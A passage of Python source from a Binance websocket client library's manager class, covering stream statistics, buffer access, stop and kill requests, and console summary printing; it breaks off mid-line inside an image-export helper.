<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_stream_subscriptions>`_
it returns a unique `request_id` - provide it to this method to receive the result.
:type request_id: stream_id (uuid)
:param timeout: seconds to wait to receive the result. If not there it returns 'False'
:type timeout: int
:return: `result` or False
"""
if request_id is False:
return False
wait_till_timestamp = time.time() + timeout
while wait_till_timestamp >= time.time():
for result in self.ringbuffer_result:
result_dict = json.loads(result)
if result_dict['id'] == request_id:
return result
return False
def get_results_from_endpoints(self):
"""
Get all the stored result messages from the ringbuffer sent by the endpoints.
:return: list
"""
return self.ringbuffer_result
def get_ringbuffer_error_max_size(self):
"""
How many entries should be stored in the ringbuffer?
:return: int
"""
return self.ringbuffer_error_max_size
def get_ringbuffer_result_max_size(self):
"""
How many entries should be stored in the ringbuffer?
:return: int
"""
return self.ringbuffer_result_max_size
def get_start_time(self):
"""
Get the start_time of the BinanceWebSocketApiManager instance
:return: timestamp
"""
return self.start_time
def get_stream_buffer_byte_size(self):
"""
Get the current byte size estimation of the stream_buffer
:return: int
"""
total_received_bytes = self.get_total_received_bytes()
total_receives = self.get_total_receives()
stream_buffer_length = self.get_stream_buffer_length()
return round(total_received_bytes / total_receives * stream_buffer_length)
def get_stream_buffer_length(self):
"""
Get the current number of items in all stream_buffer
:return: int
"""
number = 0
number += len(self.stream_buffer)
for stream_buffer_name in self.stream_buffers:
number += len(self.stream_buffers[stream_buffer_name])
return number
def get_stream_id_by_label(self, stream_label=False):
"""
Get the stream_id of a specific stream by stream label
:param stream_label: stream_label of the stream you search
:type stream_label: str
:return: stream_id or False
"""
if stream_label:
for stream_id in self.stream_list:
if self.stream_list[stream_id]['stream_label'] == stream_label:
return stream_id
return False
def get_stream_info(self, stream_id):
"""
Get all infos about a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: set
"""
current_timestamp = time.time()
try:
temp_stream_list = copy.deepcopy(self.stream_list[stream_id])
except RuntimeError:
logger.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: RuntimeError")
return self.get_stream_info(stream_id)
except KeyError:
logger.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: KeyError")
return False
if temp_stream_list['last_heartbeat'] is not None:
temp_stream_list['seconds_to_last_heartbeat'] = \
current_timestamp - self.stream_list[stream_id]['last_heartbeat']
if temp_stream_list['has_stopped'] is not False:
temp_stream_list['seconds_since_has_stopped'] = \
int(current_timestamp) - int(self.stream_list[stream_id]['has_stopped'])
try:
self.stream_list[stream_id]['processed_receives_statistic'] = self.get_stream_statistic(stream_id)
except ZeroDivisionError:
pass
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = self.get_current_receiving_speed(stream_id)
return temp_stream_list
def get_stream_label(self, stream_id=False):
"""
Get the stream_label of a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: str or False
"""
if stream_id:
return self.stream_list[stream_id]['stream_label']
else:
return False
def get_stream_subscriptions(self, stream_id, request_id=False):
"""
Get a list of subscriptions of a specific stream from Binance endpoints - the result can be received via
the `stream_buffer` and is also added to the results ringbuffer - `get_results_from_endpoints()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_results_from_endpoints>`_
to get all results or use `get_result_by_request_id(request_id)
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_result_by_request_id>`_
to get a specific one!
This function is supported by CEX endpoints only!
Info: https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md#listing-subscriptions
:param stream_id: id of a stream
:type stream_id: uuid
:param request_id: id to use for the request - use `get_request_id()` to create a unique id. If not provided or
`False`, then this method is using `get_request_id()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_request_id>`_
automatically.
:type request_id: int
:return: request_id (int)
"""
if request_id is False:
request_id = self.get_request_id()
if self.is_exchange_type('dex'):
logger.error("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") DEX websockets dont support the listing of subscriptions! Request not "
"sent!")
return False
elif self.is_exchange_type('cex'):
payload = {"method": "LIST_SUBSCRIPTIONS",
"id": request_id}
self.stream_list[stream_id]['payload'].append(payload)
logger.info("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") payload added!")
return request_id
else:
return False
def get_stream_list(self):
"""
Get a list of all streams
:return: set
"""
# get the stream list
temp_stream_list = {}
for stream_id in self.stream_list:
temp_stream_list[stream_id] = self.get_stream_info(stream_id)
return temp_stream_list
def get_stream_buffer_maxlen(self, stream_buffer_name=False):
"""
Get the maxlen value of the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
If maxlen is not specified or is None, `stream_buffer` may grow to an arbitrary length. Otherwise, the
`stream_buffer` is bounded to the specified maximum length. Once a bounded length `stream_buffer` is full, when
new items are added, a corresponding number of items are discarded from the opposite end.
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: int or False
"""
if stream_buffer_name is False:
try:
return self.stream_buffer.maxlen
except IndexError:
return False
else:
try:
return self.stream_buffers[stream_buffer_name].maxlen
except IndexError:
return False
except KeyError:
return False
def get_stream_receives_last_second(self, stream_id):
"""
Get the number of receives of specific stream from the last seconds
:param stream_id: id of a stream
:type stream_id: uuid
:return: int
"""
last_second_timestamp = int(time.time()) - 1
try:
return self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_second_timestamp]
except KeyError:
return 0
def get_stream_statistic(self, stream_id):
"""
Get the statistic of a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: set
"""
stream_statistic = {'stream_receives_per_second': 0,
'stream_receives_per_minute': 0,
'stream_receives_per_hour': 0,
'stream_receives_per_day': 0,
'stream_receives_per_month': 0,
'stream_receives_per_year': 0}
if self.stream_list[stream_id]['status'] == "running":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "stopped":
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif "crashed" in self.stream_list[stream_id]['status']:
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "restarting":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
else:
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
try:
stream_receives_per_second = self.stream_list[stream_id]['processed_receives_total'] / stream_statistic['uptime']
except ZeroDivisionError:
stream_receives_per_second = 0
stream_statistic['stream_receives_per_second'] = stream_receives_per_second
if stream_statistic['uptime'] > 60:
stream_statistic['stream_receives_per_minute'] = stream_receives_per_second * 60
if stream_statistic['uptime'] > 60 * 60:
stream_statistic['stream_receives_per_hour'] = stream_receives_per_second * 60 * 60
if stream_statistic['uptime'] > 60 * 60 * 24:
stream_statistic['stream_receives_per_day'] = stream_receives_per_second * 60 * 60 * 24
if stream_statistic['uptime'] > 60 * 60 * 24 * 30:
stream_statistic['stream_receives_per_month'] = stream_receives_per_second * 60 * 60 * 24 * 30
if stream_statistic['uptime'] > 60 * 60 * 24 * 30 * 12:
stream_statistic['stream_receives_per_year'] = stream_receives_per_second * 60 * 60 * 24 * 30 * 12
return stream_statistic
def get_total_received_bytes(self):
"""
Get number of total received bytes
:return: int
"""
# how much bytes did we receive till now?
return self.total_received_bytes
def get_total_receives(self):
"""
Get the number of total receives
:return: int
"""
return self.total_receives
def get_user_agent(self):
"""
Get the user_agent string "lib name + lib version + python version"
:return:
"""
user_agent = f"{self.name}_{str(self.get_version())}-python_{str(platform.python_version())}"
return user_agent
def get_version(self):
"""
Get the package/module version
:return: str
"""
return self.version
def get_version_unicorn_fy(self):
"""
Get the package/module version of `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_
:return: str
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.get_version()
@staticmethod
def help():
"""
Help in iPython
"""
print("Ctrl+D to close")
def increase_received_bytes_per_second(self, stream_id, size):
"""
Add the amount of received bytes per second
:param stream_id: id of a stream
:type stream_id: uuid
:param size: amount of bytes to add
:type size: int
"""
current_timestamp = int(time.time())
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp]:
pass
except KeyError:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] = 0
try:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] += size
except KeyError:
pass
def increase_processed_receives_statistic(self, stream_id):
"""
Add the number of processed receives
:param stream_id: id of a stream
:type stream_id: uuid
"""
current_timestamp = int(time.time())
try:
self.stream_list[stream_id]['processed_receives_total'] += 1
except KeyError:
return False
try:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] += 1
except KeyError:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] = 1
with self.total_receives_lock:
self.total_receives += 1
def increase_reconnect_counter(self, stream_id):
"""
Increase reconnect counter
:param stream_id: id of a stream
:type stream_id: uuid
"""
self.stream_list[stream_id]['logged_reconnects'].append(time.time())
self.stream_list[stream_id]['reconnects'] += 1
with self.reconnects_lock:
self.reconnects += 1
def increase_transmitted_counter(self, stream_id):
"""
Increase the counter of transmitted payloads
:param stream_id: id of a stream
:type stream_id: uuid
"""
self.stream_list[stream_id]['processed_transmitted_total'] += 1
with self.total_transmitted_lock:
self.total_transmitted += 1
def is_manager_stopping(self):
"""
Returns `True` if the manager has a stop request, 'False' if not.
:return: bool
"""
if self.stop_manager_request is None:
return False
else:
return True
def is_exchange_type(self, exchange_type=False):
"""
Check the exchange type!
:param exchange_type: Valid types are `dex` and `cex`!
:type exchange_type: str
:return: bool
"""
if exchange_type is False:
return False
if self.exchange == "binance.org" or \
self.exchange == "binance.org-testnet":
is_type = "dex"
elif self.exchange == "binance.com" or \
self.exchange == "binance.com-testnet" or \
self.exchange == "binance.com-margin" or \
self.exchange == "binance.com-margin-testnet" or \
self.exchange == "binance.com-isolated_margin" or \
self.exchange == "binance.com-isolated_margin-testnet" or \
self.exchange == "binance.com-futures" or \
self.exchange == "binance.com-futures-testnet" or \
self.exchange == "binance.com-coin-futures" or \
self.exchange == "binance.com-coin_futures" or \
self.exchange == "binance.je" or \
self.exchange == "binance.us" or \
self.exchange == "trbinance.com" or \
self.exchange == "jex.com":
is_type = "cex"
else:
logger.critical(f"BinanceWebSocketApiManager.is_exchange_type() - Can not determine exchange type for"
f"exchange={str(self.exchange)}")
return False
if is_type == exchange_type:
return True
else:
return False
def is_stop_request(self, stream_id, exclude_kill_requests=False):
"""
Has a specific stream a stop_request?
:param stream_id: id of a stream
:type stream_id: uuid
:param exclude_kill_requests: if `True` this method returns `False` on kill_requests
:type exclude_kill_requests: bool
:return: bool
"""
logger.debug("BinanceWebSocketApiManager.is_stop_request(" + str(stream_id) + ")")
try:
if self.stream_list[stream_id]['stop_request'] is True:
return True
elif self.is_manager_stopping():
return True
elif self.stream_list[stream_id]['kill_request'] is True and exclude_kill_requests is False:
return True
else:
return False
except KeyError:
return False
def is_stop_as_crash_request(self, stream_id):
"""
Has a specific stream a stop_as_crash_request?
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logger.debug("BinanceWebSocketApiManager.is_stop_as_crash_request(" + str(stream_id) + ")")
try:
if self.stream_list[stream_id]['crash_request'] is True:
return True
except KeyError:
pass
if self.is_manager_stopping():
return True
else:
return False
def is_update_availabe(self):
"""
Is a new release of this package available?
:return: bool
"""
installed_version = self.get_version()
if ".dev" in installed_version:
installed_version = installed_version[:-4]
if self.get_latest_version() == installed_version:
return False
elif self.get_latest_version() == "unknown":
return False
else:
return True
def is_update_availabe_unicorn_fy(self):
"""
Is a new release of `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ available?
:return: bool
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.is_update_availabe()
def is_update_availabe_check_command(self, check_command_version=False):
"""
Is a new release of `check_lucit_collector.py` available?
:return: bool
"""
installed_version = check_command_version
latest_version = self.get_latest_version_check_command()
if ".dev" in str(installed_version):
installed_version = installed_version[:-4]
if latest_version == installed_version:
return False
elif latest_version == "unknown":
return False
else:
return True
def kill_stream(self, stream_id):
"""
Kill a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logger.info("BinanceWebSocketApiManager.kill_stream(" + str(stream_id) + ")")
self.stream_list[stream_id]['kill_request'] = True
def pop_stream_data_from_stream_buffer(self, stream_buffer_name=False, mode="FIFO"):
"""
Get oldest or latest entry from
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
and remove from FIFO/LIFO stack.
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:param mode: How to read from the `stream_buffer` - "FIFO" (default) or "LIFO".
:type mode: str
:return: stream_data - str, dict or False
"""
if stream_buffer_name is False:
try:
with self.stream_buffer_lock:
if mode.upper() == "FIFO":
stream_data = self.stream_buffer.popleft()
elif mode.upper() == "LIFO":
stream_data = self.stream_buffer.pop()
else:
return False
return stream_data
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
if mode.upper() == "FIFO":
stream_data = self.stream_buffers[stream_buffer_name].popleft()
elif mode.upper() == "LIFO":
stream_data = self.stream_buffers[stream_buffer_name].pop()
else:
return False
return stream_data
except IndexError:
return False
except KeyError:
return False
def pop_stream_signal_from_stream_signal_buffer(self):
"""
Get oldest entry from
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and remove from stack/pipe (FIFO stack)
:return: stream_signal - dict or False
"""
try:
with self.stream_signal_buffer_lock:
stream_signal = self.stream_signal_buffer.popleft()
return stream_signal
except IndexError:
return False
def print_stream_info(self, stream_id, add_string=""):
"""
Print all infos about a specific stream, helps debugging :)
:param stream_id: id of a stream
:type stream_id: uuid
:param add_string: text to add to the output
:type add_string: str
:return: bool
"""
restart_requests_row = ""
binance_api_status_row = ""
stream_label_row = ""
status_row = ""
payload_row = ""
symbol_row = ""
dex_user_address_row = ""
last_static_ping_listen_key = ""
stream_info = self.get_stream_info(stream_id)
stream_row_color_prefix = ""
stream_row_color_suffix = ""
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
if len(self.stream_list[stream_id]['logged_reconnects']) > 0:
logged_reconnects_row = "\r\n logged_reconnects: "
row_prefix = ""
for timestamp in self.stream_list[stream_id]['logged_reconnects']:
logged_reconnects_row += row_prefix + \
datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC')
row_prefix = ", "
else:
logged_reconnects_row = ""
except KeyError:
return False
if "running" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m\r\n"
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "crashed" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "restarting" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "stopped" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
try:
if self.restart_requests[stream_id]['status']:
restart_requests_row = " restart_request: " + self.restart_requests[stream_id]['status'] + "\r\n"
except KeyError:
pass
if self.stream_list[stream_id]['markets'] == "!userData":
last_static_ping_listen_key = " last_static_ping_listen_key: " + \
str(self.stream_list[stream_id]['last_static_ping_listen_key']) + "\r\n"
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + "\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + "\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
current_receiving_speed = str(self.get_human_bytesize(self.get_current_receiving_speed(stream_id), "/s"))
if self.stream_list[stream_id]['symbols'] is not False:
symbol_row = " symbols:" + str(stream_info['symbols']) + "\r\n"
if self.stream_list[stream_id]["payload"]:
payload_row = " payload: " + str(self.stream_list[stream_id]["payload"]) + "\r\n"
if self.stream_list[stream_id]["dex_user_address"] is not False:
dex_user_address_row = " user_address: " + str(self.stream_list[stream_id]["dex_user_address"]) + "\r\n"
if self.stream_list[stream_id]["stream_label"] is not None:
stream_label_row = " stream_label: " + self.stream_list[stream_id]["stream_label"] + "\r\n"
if isinstance(stream_info['ping_interval'], int):
ping_interval = f"{stream_info['ping_interval']} seconds"
else:
ping_interval = stream_info['ping_interval']
if isinstance(stream_info['ping_timeout'], int):
ping_timeout = f"{stream_info['ping_timeout']} seconds"
else:
ping_timeout = stream_info['ping_timeout']
if isinstance(stream_info['close_timeout'], int):
close_timeout = f"{stream_info['close_timeout']} seconds"
else:
close_timeout = stream_info['close_timeout']
try:
uptime = self.get_human_uptime(stream_info['processed_receives_statistic']['uptime'])
print(str(self.fill_up_space_centered(96, f" {self.get_user_agent()} ", "=")) + "\r\n" +
" exchange:", str(self.stream_list[stream_id]['exchange']), "\r\n" +
str(add_string) +
" stream_id:", str(stream_id), "\r\n" +
str(stream_label_row) +
" stream_buffer_maxlen:", str(stream_info['stream_buffer_maxlen']), "\r\n" +
" channels (" + str(len(stream_info['channels'])) + "):", str(stream_info['channels']), "\r\n" +
" markets (" + str(len(stream_info['markets'])) + "):", str(stream_info['markets']), "\r\n" +
str(symbol_row) +
" subscriptions: " + str(self.stream_list[stream_id]['subscriptions']) + "\r\n" +
str(payload_row) +
str(status_row) +
str(dex_user_address_row) +
f" ping_interval: {ping_interval}\r\n"
f" ping_timeout: {ping_timeout}\r\n"
f" close_timeout: {close_timeout}\r\n"
" start_time:", str(stream_info['start_time']), "\r\n"
" uptime:", str(uptime),
"since " + str(
datetime.utcfromtimestamp(stream_info['start_time']).strftime('%Y-%m-%d, %H:%M:%S UTC')) +
"\r\n" +
" reconnects:", str(stream_info['reconnects']), logged_reconnects_row, "\r\n" +
str(restart_requests_row) +
str(binance_api_status_row) +
str(last_static_ping_listen_key) +
" last_heartbeat:", str(stream_info['last_heartbeat']), "\r\n"
" seconds_to_last_heartbeat:", str(stream_info['seconds_to_last_heartbeat']), "\r\n"
" kill_request:", str(stream_info['kill_request']), "\r\n"
" stop_request:", str(stream_info['stop_request']), "\r\n"
" has_stopped:", str(stream_info['has_stopped']), "\r\n"
" seconds_since_has_stopped:",
str(stream_info['seconds_since_has_stopped']), "\r\n"
" current_receiving_speed:", str(current_receiving_speed), "\r\n" +
" processed_receives:", str(stream_info['processed_receives_total']), "\r\n" +
" transmitted_payloads:", str(self.stream_list[stream_id]['processed_transmitted_total']), "\r\n" +
" stream_most_receives_per_second:",
str(stream_info['receives_statistic_last_second']['most_receives_per_second']), "\r\n"
" stream_receives_per_second:",
str(stream_info['processed_receives_statistic']['stream_receives_per_second'].__round__(3)), "\r\n"
" stream_receives_per_minute:",
str(stream_info['processed_receives_statistic']['stream_receives_per_minute'].__round__(3)), "\r\n"
" stream_receives_per_hour:",
str(stream_info['processed_receives_statistic']['stream_receives_per_hour'].__round__(3)), "\r\n"
" stream_receives_per_day:",
str(stream_info['processed_receives_statistic']['stream_receives_per_day'].__round__(3)), "\r\n"
"===============================================================================================\r\n")
except KeyError:
self.print_stream_info(stream_id)
def print_summary(self, add_string="", disable_print=False):
"""
Print an overview of all streams
:param add_string: text to add to the output
:type add_string: str
:param disable_print: set to `True` to use curses instead of print()
:type disable_print: bool
"""
streams = len(self.stream_list)
active_streams = 0
crashed_streams = 0
restarting_streams = 0
stopped_streams = 0
active_streams_row = ""
restarting_streams_row = ""
stopped_streams_row = ""
all_receives_per_second = 0.0
current_receiving_speed = 0
streams_with_stop_request = 0
stream_rows = ""
crashed_streams_row = ""
binance_api_status_row = ""
received_bytes_per_x_row = ""
streams_with_stop_request_row = ""
stream_buffer_row = ""
highest_receiving_speed_row = f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} " \
f"(reached at " \
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])})"
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError:
return ""
for stream_id in temp_stream_list:
stream_row_color_prefix = ""
stream_row_color_suffix = ""
current_receiving_speed += self.get_current_receiving_speed(stream_id)
stream_statistic = self.get_stream_statistic(stream_id)
if self.stream_list[stream_id]['status'] == "running":
active_streams += 1
all_receives_per_second += stream_statistic['stream_receives_per_second']
try:
if self.restart_requests[stream_id]['status'] == "restarted":
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
try:
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 4:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
elif self.stream_list[stream_id]['status'] == "stopped":
stopped_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif self.stream_list[stream_id]['status'] == "restarting":
restarting_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif "crashed" in self.stream_list[stream_id]['status']:
crashed_streams += 1
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
if self.stream_list[stream_id]['stream_label'] is not None:
if len(self.stream_list[stream_id]['stream_label']) > 18:
stream_label = str(self.stream_list[stream_id]['stream_label'])[:13] + "..."
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
stream_rows += stream_row_color_prefix + str(stream_id) + stream_row_color_suffix + " |" + \
self.fill_up_space_right(17, stream_label) + "|" + \
self.fill_up_space_left(8, self.get_stream_receives_last_second(stream_id)) + "|" + \
self.fill_up_space_left(11, stream_statistic['stream_receives_per_second'].__round__(2)) + "|" + \
self.fill_up_space_left(8, self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']) \
+ "|" + stream_row_color_prefix + \
self.fill_up_space_left(8, len(self.stream_list[stream_id]['logged_reconnects'])) + \
stream_row_color_suffix + "\r\n "
if self.is_stop_request(stream_id, exclude_kill_requests=True) is True and \
self.stream_list[stream_id]['status'] == "running":
streams_with_stop_request += 1
if streams_with_stop_request >= 1:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
streams_with_stop_request_row = stream_row_color_prefix + " streams_with_stop_request: " + \
str(streams_with_stop_request) + stream_row_color_suffix + "\r\n"
if crashed_streams >= 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
crashed_streams_row = stream_row_color_prefix + " crashed_streams: " + str(crashed_streams) \
+ stream_row_color_suffix + "\r\n"
total_received_bytes = str(self.get_total_received_bytes()) + " (" + str(
self.get_human_bytesize(self.get_total_received_bytes())) + ")"
try:
received_bytes_per_second = self.get_total_received_bytes() / (time.time() - self.start_time)
received_bytes_per_x_row += str(self.get_human_bytesize(received_bytes_per_second, '/s')) + " (per day " + \
str(((received_bytes_per_second / 1024 / 1024 / 1024) * 60 * 60 * 24).__round__(2))\
+ " gB)"
if self.get_stream_buffer_length() > 50:
stream_row_color_prefix = "\033[1m\033[34m"
stream_row_color_suffix = "\033[0m"
stream_buffer_row += stream_row_color_prefix + " stream_buffer_stored_items: " + \
str(self.get_stream_buffer_length()) + "\r\n"
stream_buffer_row += " stream_buffer_byte_size: " + str(self.get_stream_buffer_byte_size()) + \
" (" + str(self.get_human_bytesize(self.get_stream_buffer_byte_size())) + ")" + \
stream_row_color_suffix + "\r\n"
if active_streams > 0:
active_streams_row = " \033[1m\033[32mactive_streams: " + str(active_streams) + "\033[0m\r\n"
if restarting_streams > 0:
restarting_streams_row = " \033[1m\033[33mrestarting_streams: " + str(restarting_streams) + "\033[0m\r\n"
if stopped_streams > 0:
stopped_streams_row = " \033[1m\033[33mstopped_streams: " + str(stopped_streams) + "\033[0m\r\n"
if self.binance_api_status['weight'] is not None:
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + \
str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
try:
print_text = (
str(self.fill_up_space_centered(96, f" {self.get_user_agent()} ", "=")) + "\r\n" +
" exchange: " + str(self.stream_list[stream_id]['exchange']) + "\r\n" +
" uptime: " + str(self.get_human_uptime(time.time() - self.start_time)) + " since " +
str(self.get_date_of_timestamp(self.start_time)) + "\r\n" +
" streams: " + str(streams) + "\r\n" +
str(active_streams_row) +
str(crashed_streams_row) +
str(restarting_streams_row) +
str(stopped_streams_row) +
str(streams_with_stop_request_row) +
" subscriptions: " + str(self.get_number_of_all_subscriptions()) + "\r\n" +
str(stream_buffer_row) +
" current_receiving_speed: " + str(self.get_human_bytesize(current_receiving_speed, "/s")) + "\r\n" +
" average_receiving_speed: " + str(received_bytes_per_x_row) + "\r\n" +
" highest_receiving_speed: " + str(highest_receiving_speed_row) + "\r\n" +
" total_receives: " + str(self.total_receives) + "\r\n"
" total_received_bytes: " + str(total_received_bytes) + "\r\n"
" total_transmitted_payloads: " + str(self.total_transmitted) + "\r\n" +
" stream_buffer_maxlen: " + str(self.stream_buffer_maxlen) + "\r\n" +
str(binance_api_status_row) +
" process_ressource_usage: cpu=" + str(self.get_process_usage_cpu()) + "%, memory=" +
str(self.get_process_usage_memory()) + ", threads=" + str(self.get_process_usage_threads()) +
"\r\n" + str(add_string) +
" ---------------------------------------------------------------------------------------------\r\n"
" stream_id | stream_label | last | average | peak | recon\r\n"
" ---------------------------------------------------------------------------------------------\r\n"
" " + str(stream_rows) +
"---------------------------------------------------------------------------------------------\r\n"
" all_streams |" +
self.fill_up_space_left(8, self.get_all_receives_last_second()) + "|" +
self.fill_up_space_left(11, all_receives_per_second.__round__(2)) + "|" +
self.fill_up_space_left(8, self.most_receives_per_second) + "|" +
self.fill_up_space_left(8, self.reconnects) + "\r\n" +
"===============================================================================================\r\n"
)
if disable_print:
if sys.platform.startswith('Windows'):
print_text = self.remove_ansi_escape_codes(print_text)
return print_text
else:
print(print_text)
except UnboundLocalError:
pass
except ZeroDivisionError:
pass
def print_summary_to_png(self, print_summary_export_path, hight_per_row=12.5):
"""
Create a PNG image file with the console output of `print_summary()`
*LINUX ONLY* It should not be hard to make it OS independent:
https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/61
:param print_summary_export_path: If you want to export the output of print_summary() to an image,
please provide a path like "/var/www/html/". `View the Wiki!
<https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/How-to-export-print_summary()-stdout-to-PNG%3F>`_
:type print_summary_export_path: str
:param hight_per_row: set the hight per row for the image hight calculation
:type hight_per_row: int
:return: bool
"""
print_text = self.print_summary(disable_print=True)
# Todo:
# 1. Handle paths right
# 2. Use PythonMagick instead of Linux ImageMagick
with open(print_summary_export_path + "print_summary.txt", 'w') as text_file:
print(self.remove_ansi_escape_codes(print_text), file=text_file)
try:
image_hight = print_text.count("\n") * hight_per_row + 15
except AttributeError:
return False
os.system('convert -size 720x' + str(image_hight) + ' xc:black -font "FreeMono" -pointsize 12 -fill white -annotate '
